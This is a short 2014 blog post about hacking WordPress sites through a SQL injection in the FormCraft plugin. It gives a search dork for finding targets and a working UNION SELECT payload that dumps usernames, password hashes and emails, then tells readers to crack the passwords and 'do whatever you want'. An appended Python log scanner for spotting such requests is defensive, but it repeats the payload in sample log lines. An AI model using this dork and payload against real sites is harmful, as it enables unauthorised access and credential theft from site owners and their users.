Friday, January 17, 2014

WordPress Site Hacking via SQLi



Dork: inurl:/wp-content/plugins/formcraft/form.php?id=

Exploit link:

form.php?id=3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_pass,0x3a,user_email),5,6,7,8,9,10,11 FROM wp_users--

The username & password will appear. Crack the pass, then log in & do whatever you want :)
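
For site owners, a request like the one above stands out in web server logs. The following is an added example, not part of the original post: it scans access-log lines for requests to the plugin's form.php whose id is not a plain integer. It assumes Common Log Format and that a legitimate id is always an integer, as in id=3; the sample lines and the names inspect_line and scan are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Plugin path taken from the post; subdirectory installs are matched by suffix.
FORM_PATH = "/wp-content/plugins/formcraft/form.php"
# Assumed log layout: Common Log Format, client address first, quoted request line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Tokens seen in the post's request; used only to annotate a finding.
SQL_TOKENS = re.compile(
    r"(?:\b(?:union|select|from|group_concat|wp_users)\b|--|0x[0-9a-f]+)", re.I)

def inspect_line(line):
    """Return (client, id_value, tokens) if the form.php id is not an integer."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    parts = urlsplit(target)
    if not parts.path.lower().endswith(FORM_PATH):
        return None
    # parse_qs decodes %xx and '+' so encoded payloads are compared in clear text.
    for value in parse_qs(parts.query, keep_blank_values=True).get("id", []):
        if not re.fullmatch(r"[0-9]+", value):
            tokens = sorted({t.lower() for t in SQL_TOKENS.findall(value)})
            return client, value, tokens
    return None

def scan(lines):
    """Collect a finding for every suspicious line."""
    return [hit for hit in map(inspect_line, lines) if hit]

# Constructed sample lines (documentation addresses), not taken from a real server.
SAMPLE_LOG = [
    '203.0.113.7 - - [17/Jan/2014:10:01:02 +0000] '
    '"GET /wp-content/plugins/formcraft/form.php?id=3 HTTP/1.1" 200 5120',
    '198.51.100.23 - - [17/Jan/2014:10:03:44 +0000] '
    '"GET /wp-content/plugins/formcraft/form.php?id=3%20UNION%20SELECT%201,2,3,'
    'group_concat(user_login,0x3a,user_pass)%20FROM%20wp_users-- HTTP/1.1" 200 6230',
    '192.0.2.15 - - [17/Jan/2014:10:05:10 +0000] '
    '"GET /blog/wp-content/plugins/formcraft/form.php?id=3%27 HTTP/1.1" 500 310',
    '203.0.113.7 - - [17/Jan/2014:10:06:00 +0000] '
    '"GET /index.php?id=abc HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for client, value, tokens in scan(SAMPLE_LOG):
        print(f"{client} non-integer id={value!r} tokens={tokens}")
```

The integer check is what decides a finding; the token list only labels it, so a non-integer id is reported even when it contains none of the listed keywords.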
